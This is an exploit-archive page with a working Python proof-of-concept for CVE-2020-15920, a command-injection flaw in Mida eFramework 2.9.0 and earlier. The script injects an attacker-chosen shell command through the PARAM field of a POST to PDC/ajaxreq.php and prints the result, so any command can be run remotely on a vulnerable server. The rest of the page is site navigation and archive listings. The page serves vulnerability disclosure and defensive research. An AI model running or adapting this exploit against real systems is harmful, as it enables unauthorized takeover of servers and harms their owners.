Mida eFramework 2.9.0 Remote Code Execution

Mida eFramework 2.9.0 Remote Code Execution: Posted Aug 27, 2020; Authored by elbae; Mida eFramework version 2.9.0 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2020-15920; SHA-256 | 1d91860562323de0b96d48e3fab2bd5c3cff83336de0debd04431d028e64421a; Download | Favorite | View

Mida eFramework 2.9.0 Remote Code Execution

# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.9.0
# CVE : CVE-2020-15920


#! /usr/bin/python3
# -*- coding: utf-8 -*-

import argparse
import requests
import subprocess
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def print_disclaimer():
   print("""
    ---------------------
    Disclaimer:
    1) For testing purpose only.
    2) Do not attack production environments.
    3) Intended for educational purposes only and cannot be used for law
violation or personal gain.
    4) The author is not responsible for any possible harm caused by this
material.
    ---------------------""")


def print_info():
   print("""
[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920)
[*] Reference:
https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability
(RCE) in PDC/ajaxreq.php
    Version\t< 2.9.0\t./CVE-2020-15920
http://192.168.1.60:8090/PDC/ajaxreq.php id
    Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php
id """)

def pwn(url,cmd):
   running = """
[*] Target URL: {0}
[*] Command: {1}
   """
   print(running.format(url,cmd))
   data = {
      "DIAGNOSIS":"PING",
      "PARAM":"127.0.0.1 -c 0; {0}".format(cmd)
   }
   r = requests.post(url,data=data,verify=False)
   line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]"
   pretty_output = r.text.replace('<br>','\n')
   print(line+"\n{0}\n".format(pretty_output)+line)

def main():
   print_info()
   print_disclaimer()
   parser = argparse.ArgumentParser()
   parser.add_argument("target", type=str, help="the complete target URL")
   parser.add_argument("cmd", type=str, help="the command you want to run")
   args = parser.parse_args()
   pwn(args.target, args.cmd)

if __name__ == '__main__':
   main()

Top Authors In Last 30 Days

Red Hat 297 files
Ubuntu 69 files
Debian 20 files
Gentoo 8 files
Apple 6 files
Google Security Research 4 files
LiquidWorm 4 files
Spencer McIntyre 3 files
Alter Prime 3 files
Jann Horn 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Mida eFramework 2.9.0 Remote Code Execution

Mida eFramework 2.9.0 Remote Code Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Mida eFramework 2.9.0 Remote Code Execution

Share This

Mida eFramework 2.9.0 Remote Code Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems